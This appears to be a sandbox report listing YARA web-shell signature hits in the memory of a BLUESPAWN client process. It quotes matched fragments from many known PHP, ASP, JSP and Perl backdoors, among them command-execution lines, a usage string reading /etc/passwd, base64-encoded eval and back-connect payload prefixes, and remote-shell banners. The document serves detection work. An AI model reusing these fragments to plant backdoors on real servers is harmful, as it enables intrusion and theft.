- 0x351c76:$s2: -- Use a poor man's pipe ... a temp file --
- 0x35fb05:$s2: -- Use a poor man's pipe ... a temp file --
- 0x2f720a:$s3: maceo @ dogmile.com
- 0x309e73:$s3: maceo @ dogmile.com
- 0x351ca4:$s3: maceo @ dogmile.com
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | simple_backdoor_php | Semi-Auto-generated - file simple-backdoor.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2dec4a:$s0: $cmd = ($_REQUEST['cmd']);
- 0x2f7327:$s0: $cmd = ($_REQUEST['cmd']);
- 0x308f7b:$s0: $cmd = ($_REQUEST['cmd']);
- 0x35eff2:$s0: $cmd = ($_REQUEST['cmd']);
- 0x2f734e:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308e84:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x3097c9:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x351d8a:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x35ef23:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x35f5f8:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x2f7395:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x308f03:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x309848:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | mysql_shell_php | Semi-Auto-generated - file mysql_shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f74d7:$s0: SooMin Kim
- 0x2fd96a:$s0: SooMin Kim
- 0x351eb5:$s0: SooMin Kim
- 0x356adb:$s0: SooMin Kim
- 0x2f74ee:$s1: smkim@popeye.snu.ac.kr
- 0x351ec2:$s1: smkim@popeye.snu.ac.kr
- 0x2f7511:$s2: echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen
- 0x351edb:$s2: echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Dive_Shell_1_0___Emperor_Hacking_Team_php | Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7696:$s0: Emperor Hacking TEAM
- 0x35200c:$s0: Emperor Hacking TEAM
- 0x2f76b7:$s1: Simshell
- 0x2f8165:$s1: Simshell
- 0x2e953e:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x2f76cc:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x2f8188:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x2fcb2d:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x348195:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x35202e:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x352866:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x356053:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x2f76f9:$s3: <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST
- 0x352051:$s3: <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Asmodeus_v0_1_pl | Semi-Auto-generated - file Asmodeus v0.1.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7848:$s0: [url=http://www.governmentsecurity.org
- 0x35214c:$s0: [url=http://www.governmentsecurity.org
- 0x2f787b:$s1: perl asmodeus.pl client 6666 127.0.0.1
- 0x352175:$s1: perl asmodeus.pl client 6666 127.0.0.1
- 0x2f78ae:$s2: print "Asmodeus Perl Remote Shell
- 0x35219e:$s2: print "Asmodeus Perl Remote Shell
- 0x2f78dc:$s4: $internet_addr = inet_aton("$host") or die "ALOA:$!\n";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | backup_php_often_with_c99shell | Semi-Auto-generated - file backup.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7a23:$s0: #phpMyAdmin MySQL-Dump
- 0x2f7a46:$s2: ;db_connect();header('Content-Type: application/octetstr
- 0x3522ce:$s2: ;db_connect();header('Content-Type: application/octetstr
- 0x2f7a8b:$s4: $data .= "#Database: $database
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Reader_asp | Semi-Auto-generated - file Reader.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7ba1:$s1: Mehdi & HolyDemon
- 0x3523cb:$s1: Mehdi & HolyDemon
- 0x2f7bbf:$s2: www.infilak.
- 0x3523df:$s2: www.infilak.
- 0x2f7bd8:$s3: '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%
- 0x3523ee:$s3: '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpshell17_php | Semi-Auto-generated - file phpshell17.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2d4f3d:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x2f7d26:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x32031e:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x2f7d76:$s1: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></
- 0x35252e:$s1: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></
- 0x2f7dd3:$s2: href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | myshell_php_php | Semi-Auto-generated - file myshell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f7f1c:$s0: @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.
- 0x352676:$s0: @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.
- 0x2f7f6f:$s1: echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color
- 0x3526bf:$s1: echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color
- 0x2f7fc7:$s2: $fileEditInfo = " ::::::: Owner: <font color=$
- 0x35270d:$s2: $fileEditInfo = " ::::::: Owner: <font color=$
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SimShell_1_0___Simorgh_Security_MGZ_php | Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f813e:$s0: Simorgh Security Magazine
- 0x352830:$s0: Simorgh Security Magazine
- 0x2f8165:$s1: Simshell.css
- 0x35284d:$s1: Simshell.css
- 0x2f817e:$s2: } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'],
- 0x35285c:$s2: } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'],
- 0x2f81d7:$s3: www.simorgh-ev.com
- 0x305afc:$s3: www.simorgh-ev.com
- 0x3528ab:$s3: www.simorgh-ev.com
- 0x35c7ef:$s3: www.simorgh-ev.com
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | jspshall_jsp | Semi-Auto-generated - file jspshall.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f82e5:$s0: kj021320
- 0x352965:$s0: kj021320
- 0x2f82fa:$s1: case 'T':systemTools(out);break;
- 0x352970:$s1: case 'T':systemTools(out);break;
- 0x2f8327:$s2: out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file
- 0x352993:$s2: out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rootshell_php | Semi-Auto-generated - file rootshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f85a4:$s0: shells.dl.am
- 0x352b5e:$s0: shells.dl.am
- 0x2f85bd:$s1: This server has been infected by $owner
- 0x352b6d:$s1: This server has been infected by $owner
- 0x2f85f1:$s2: <input type="submit" value="Include!" name="inc"></p>
- 0x352b97:$s2: <input type="submit" value="Include!" name="inc"></p>
- 0x2f8633:$s4: Could not write to file! (Maybe you didn't enter any text?)
- 0x352bcf:$s4: Could not write to file! (Maybe you didn't enter any text?)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | connectback2_pl | Semi-Auto-generated - file connectback2.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f8770:$s0: #We Are: MasterKid, AleXutz, FatMan & MiKuTuL
- 0x352cb8:$s0: #We Are: MasterKid, AleXutz, FatMan & MiKuTuL
- 0x2f87cd:$s1: echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel
- 0x352d0b:$s1: echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel
- 0x2f882a:$s2: ConnectBack Backdoor
- 0x352d5e:$s2: ConnectBack Backdoor
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DefaceKeeper_0_2_php | Semi-Auto-generated - file DefaceKeeper_0.2.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f894a:$s0: target fi1e:<br><input type="text" name="target" value="index.php"></br>
- 0x2f899f:$s1: eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9
- 0x352e75:$s1: eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9
- 0x2f89fb:$s2: <img src="http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png" align="center
- 0x352ec7:$s2: <img src="http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png" align="center
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shells_PHP_wso | Semi-Auto-generated - file wso.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f8b3c:$s0: $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi
- 0x352fb4:$s0: $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi
- 0x2f8b98:$s3: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos
- 0x353006:$s3: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | backdoor1_php | Semi-Auto-generated - file backdoor1.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f8ce2:$s1: echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."..
- 0x3530fc:$s1: echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."..
- 0x2f8d35:$s2: class backdoor {
- 0x353145:$s2: class backdoor {
- 0x2f8d52:$s4: echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <
- 0x353158:$s4: echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | elmaliseker_asp | Semi-Auto-generated - file elmaliseker.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f8e9d:$s0: if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "."
- 0x35324f:$s0: if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "."
- 0x2f8ef6:$s1: <form name=frmCMD method=post action="<%=gURL%>">
- 0x35329e:$s1: <form name=frmCMD method=post action="<%=gURL%>">
- 0x2f8f34:$s2: dim zombie_array,special_array
- 0x3532d2:$s2: dim zombie_array,special_array
- 0x2f8f5f:$s3: http://vnhacker.org
- 0x3532f3:$s3: http://vnhacker.org
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | indexer_asp | Semi-Auto-generated - file indexer.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e2291:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x2f906c:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3174d4:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x34368c:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3533ac:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x369616:$s0: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x2f90c5:$s2: D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit
- 0x3533fb:$s2: D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DxShell_php_php | Semi-Auto-generated - file DxShell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2da53c:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f5ee8:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f9215:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x33e14f:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x350e36:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x3534f7:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f926c:$s2: print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><
- 0x353544:$s2: print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | s72_Shell_v1_1_Coding_html | Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f93d1:$s0: Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><
- 0x353655:$s0: Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><
- 0x2f9422:$s1: s72 Shell v1.0 Codinf by Cr@zy_King
- 0x35369c:$s1: s72 Shell v1.0 Codinf by Cr@zy_King
- 0x2f9452:$s3: echo "<p align=center>Dosya Zaten Bulunuyor</p>"
- 0x3536c2:$s3: echo "<p align=center>Dosya Zaten Bulunuyor</p>"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hidshell_php_php | Semi-Auto-generated - file hidshell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f9586:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x307cbd:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x3537a2:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x35e1ce:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | kacak_asp | Semi-Auto-generated - file kacak.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f96cc:$s0: Kacak FSO 1.0
- 0x353894:$s0: Kacak FSO 1.0
- 0x2f96e6:$s1: if request.querystring("TGH") = "1" then
- 0x3538a4:$s1: if request.querystring("TGH") = "1" then
- 0x2f971b:$s3: <font color="#858585">BuqX</font></a></font><font face="Verdana" style=
- 0x3538cf:$s3: <font color="#858585">BuqX</font></a></font><font face="Verdana" style=
- 0x2f976f:$s4: mailto:BuqX@hotmail.com
- 0x353919:$s4: mailto:BuqX@hotmail.com
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Backdoor_Connect_pl_php | Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f98a0:$s0: LorD of IRAN HACKERS SABOTAGE
- 0x3539f6:$s0: LorD of IRAN HACKERS SABOTAGE
- 0x2f98ca:$s1: LorD-C0d3r-NT
- 0x353a16:$s1: LorD-C0d3r-NT
- 0x2f87cd:$s2: echo --==Userinfo==-- ;
- 0x2f98e4:$s2: echo --==Userinfo==-- ;
- 0x352d0b:$s2: echo --==Userinfo==-- ;
- 0x353a26:$s2: echo --==Userinfo==-- ;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Antichat_Socks5_Server_php_php | Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f9a1b:$s0: $port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);
- 0x2f9a78:$s3: # [+] Domain name address type
- 0x353b5c:$s3: # [+] Domain name address type
- 0x2f9aa5:$s4: www.antichat.ru
- 0x353b7f:$s4: www.antichat.ru
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Antichat_Shell_v1_3_php | Semi-Auto-generated - file Antichat Shell v1.3.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2df062:$s0: Antichat
- 0x2df0ad:$s0: Antichat
- 0x2df1d9:$s0: Antichat
- 0x2f9908:$s0: Antichat
- 0x2f9967:$s0: Antichat
- 0x2f9ac1:$s0: Antichat
- 0x2f9b19:$s0: Antichat
- 0x2f9bc6:$s0: Antichat
- 0x341451:$s0: Antichat
- 0x341482:$s0: Antichat
- 0x341551:$s0: Antichat
- 0x353a3d:$s0: Antichat
- 0x353a82:$s0: Antichat
- 0x353b8e:$s0: Antichat
- 0x353bcc:$s0: Antichat
- 0x353c4c:$s0: Antichat
- 0x2f9bdb:$s1: Can't open file, permission denide
- 0x353c57:$s1: Can't open file, permission denide
- 0x2f5f9c:$s2: $ra44
- 0x2f5fbf:$s2: $ra44
- 0x2f9c0a:$s2: $ra44
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php | Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2d54d3:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x2f9d4b:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x33aadc:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x353d69:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy
- 0x2d5526:$s1: Mode Shell v1.0</font></span>
- 0x2f9d9c:$s1: Mode Shell v1.0</font></span>
- 0x33ab25:$s1: Mode Shell v1.0</font></span>
- 0x353db0:$s1: Mode Shell v1.0</font></span>
- 0x2f9dc6:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
- 0x3067e3:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
- 0x353dd0:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
- 0x35d1c1:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | mysql_php_php | Semi-Auto-generated - file mysql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f9ef6:$s0: action=mysqlread&mass=loadmass">load all defaults
- 0x353eac:$s0: action=mysqlread&mass=loadmass">load all defaults
- 0x2f9f34:$s2: if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru
- 0x353ee0:$s2: if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru
- 0x2f5f9c:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x2f9f85:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x2fb6b4:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x30db2b:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x350ed6:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x353f27:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x3550b0:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
- 0x362922:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 =
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Worse_Linux_Shell_php | Semi-Auto-generated - file Worse Linux Shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa0d1:$s1: print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td
- 0x35401f:$s1: print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td
- 0x2fa12b:$s2: print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd
- 0x35406f:$s2: print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cyberlords_sql_php_php | Semi-Auto-generated - file cyberlords_sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa285:$s0: Coded by n0 [nZer0]
- 0x354175:$s0: Coded by n0 [nZer0]
- 0x2fa2a5:$s1: www.cyberlords.net
- 0x35418b:$s1: www.cyberlords.net
- 0x2fa2c5:$s2: U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
- 0x3541a1:$s2: U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
- 0x2fa31e:$s3: return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
- 0x3541f0:$s3: return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cmd_asp_5_1_asp | Semi-Auto-generated - file cmd-asp-5.1.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa461:$s0: Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
- 0x2d946d:$s3: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
- 0x2fa4a1:$s3: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | pws_php_php | Semi-Auto-generated - file pws.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa5d7:$s0: <div align="left"><font size="1">Input command :</font></div>
- 0x2fa621:$s1: <input type="text" name="cmd" size="30" class="input"><br>
- 0x2fa668:$s4: <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>
- 0x354474:$s4: <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Shell_php_php | Semi-Auto-generated - file PHP Shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2dca19:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x2fa7b3:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x33fa69:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x35456b:$s0: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x2df006:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x2fa807:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x341402:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x3545b5:$s1: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html | Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fa85a:$s0: Ayyildiz
- 0x2fa8c3:$s0: Ayyildiz
- 0x2fa981:$s0: Ayyildiz
- 0x30be37:$s0: Ayyildiz
- 0x30bea3:$s0: Ayyildiz
- 0x325ac6:$s0: Ayyildiz
- 0x3545fb:$s0: Ayyildiz
- 0x35464a:$s0: Ayyildiz
- 0x3546db:$s0: Ayyildiz
- 0x36133b:$s0: Ayyildiz
- 0x36138d:$s0: Ayyildiz
- 0x373656:$s0: Ayyildiz
- 0x2fa996:$s1: TouCh By iJOo
- 0x30bfa7:$s1: TouCh By iJOo
- 0x3546e6:$s1: TouCh By iJOo
- 0x36144a:$s1: TouCh By iJOo
- 0x2fa9b0:$s2: First we check if there has been asked for a working directory
- 0x3546f6:$s2: First we check if there has been asked for a working directory
- 0x2fa9fb:$s3: http://ayyildiz.org/images/whosonline2.gif
- 0x354737:$s3: http://ayyildiz.org/images/whosonline2.gif
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | EFSO_2_asp | Semi-Auto-generated - file EFSO_2.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fab1d:$s0: Ejder was HERE
- 0x354805:$s0: Ejder was HERE
- 0x2fab38:$s1: *~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~
- 0x354816:$s1: *~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | lamashell_php | Semi-Auto-generated - file lamashell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fac86:$s0: lama's'hell
- 0x309619:$s0: lama's'hell
- 0x35f4c8:$s0: lama's'hell
- 0x2fac9e:$s1: if($_POST['king'] == "") {
- 0x35491e:$s1: if($_POST['king'] == "") {
- 0x2facc5:$s2: if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['f
- 0x35493b:$s2: if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['f
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Ajax_PHP_Command_Shell_php | Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fae27:$s1: newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>
- 0x354a49:$s1: newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>
- 0x2fae84:$s2: Empty Command..type \"shellhelp\" for some ehh...help
- 0x354a9c:$s2: Empty Command..type \"shellhelp\" for some ehh...help
- 0x2faec6:$s3: newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct
- 0x354ad4:$s3: newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JspWebshell_1_2_jsp | Semi-Auto-generated - file JspWebshell 1.2.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ea0c3:$s0: JspWebshell
- 0x2ea131:$s0: JspWebshell
- 0x2faf23:$s0: JspWebshell
- 0x2faf77:$s0: JspWebshell
- 0x2fb020:$s0: JspWebshell
- 0x3081bd:$s0: JspWebshell
- 0x308215:$s0: JspWebshell
- 0x30c512:$s0: JspWebshell
- 0x30c56c:$s0: JspWebshell
- 0x34893b:$s0: JspWebshell
- 0x34898f:$s0: JspWebshell
- 0x354b24:$s0: JspWebshell
- 0x354b5e:$s0: JspWebshell
- 0x354bda:$s0: JspWebshell
- 0x35e598:$s0: JspWebshell
- 0x35e5d6:$s0: JspWebshell
- 0x36186f:$s0: JspWebshell
- 0x3618af:$s0: JspWebshell
- 0x2fb038:$s1: CreateAndDeleteFolder is error:
- 0x3082fa:$s1: CreateAndDeleteFolder is error:
- 0x30c651:$s1: CreateAndDeleteFolder is error:
|
